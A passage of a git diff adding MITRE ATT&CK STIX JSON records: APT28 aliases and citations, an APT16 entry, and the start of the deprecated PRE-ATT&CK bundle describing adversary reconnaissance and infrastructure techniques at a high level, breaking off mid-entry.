DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "G0007", + "url": "https://attack.mitre.org/groups/G0007", + "source_name": "mitre-attack" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. (Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "source_name": "Ars Technica GRU indictment Jul 2018" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "source_name": "SecureWorks TG-4127" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "source_name": "ESET Zebrocy May 2019" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "source_name": "Talos Seduploader Oct 2017" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + }, + { + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", + "source_name": "Microsoft STRONTIUM Aug 2019" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." + } + ], + "aliases": [ + "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "modified": "2020-10-06T23:32:21.793Z", + "created": "2017-05-31T21:31:48.664Z", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "x_mitre_version": "3.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json new file mode 100644 index 0000000000000000000000000000000000000000..1ab04b21beedc1dc39d435997290ae4c4176f002 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--4ca310bf-b934-429e-ab71-a533923a1eb5", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT16", + "description": "[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0023", + "external_id": "G0023" + }, + { + "source_name": "APT16", + "description": "(Citation: FireEye EPS Awakens Part 2)" + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "aliases": [ + "APT16" + ], + "modified": "2020-10-12T19:54:58.537Z", + "created": "2017-05-31T21:31:56.270Z", + "x_mitre_version": "1.1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..58ba7ac5d21770b9c7363840c1a07f8062d1f6b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,17 @@ +{ + "type": "bundle", + "id": "bundle--2434d2f8-1824-4225-bc22-527cd0a454cc", + "spec_version": "2.0", + "objects": [ + { + "type": "marking-definition", + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-06-01T00:00:00Z", + "definition_type": "statement", + "definition": { + "statement": "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + } + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/pre-attack.json b/cti-ATT-CK-v13.1/pre-attack/pre-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..3a1469890ae1a699f8ba0d7c7b95451ad72efe5d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/pre-attack.json @@ -0,0 +1,8724 @@ +{ + "type": "bundle", + "id": "bundle--58c38583-fcc5-49ed-8a05-0dfe305e0c41", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).\n\nOpen source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1266", + "external_id": "T1266" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather digital intelligence about a person is easily aided by social networking sites, free/for fee people search engines, and publicly available information (e.g., county databases on tickets/DUIs).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1043", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1247).\n\nOpen source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1247", + "external_id": "T1247" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain. Direct access to the selected target is not required for the adversary to conduct this technique. There is a limited ability to detect this by looking at referrer fields on local web site accesses (e.g., a person who has accessed your web servers from [https://www.shodan.io Shodan]).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather technical intelligence about Internet accessible systems/devices by obtaining various commercial data sets and supporting business intelligence tools for ease of analysis. Commercial data set examples include advertising content delivery networks, Internet mapping/traffic collections, system fingerprinting data sets, device fingerprinting data sets, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1024", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).\n\nData sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1277", + "external_id": "T1277" + }, + { + "source_name": "SANSThreatProfile", + "description": "Stephen Irwin. (2014, September 8). Creating a Threat Profile for Your Organization. Retrieved March 5, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + }, + { + "source_name": "isight-osint", + "description": "Dawn Lomer. (2017). 101+ OSINT Resources for Investigators. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1054", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1329).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1329", + "external_id": "T1329" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1106", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Wide variety of cloud/VPS/hosting/compute/storage solutions available for adversary to acquire freely or at a low cost.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Hard to differentiate from standard business operations.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1307", + "external_id": "T1307" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1084", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1308", + "external_id": "T1308" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Nemucod Facebook", + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1085", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1330", + "external_id": "T1330" + }, + { + "source_name": "LOWBALL2015", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1107", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).\n\nCode signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1310", + "external_id": "T1310" + }, + { + "description": "Brad Arkin. (2012, September 27). Inappropriate Use of Adobe Code Signing Certificate. Retrieved March 28, 2017.", + "source_name": "Adobe Code Signing Cert" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1087", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).\n\nCode signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1332", + "external_id": "T1332" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1109", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b3f36317-3940-4d71-968f-e11ac1bf6a31", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Aggregate individual's digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise 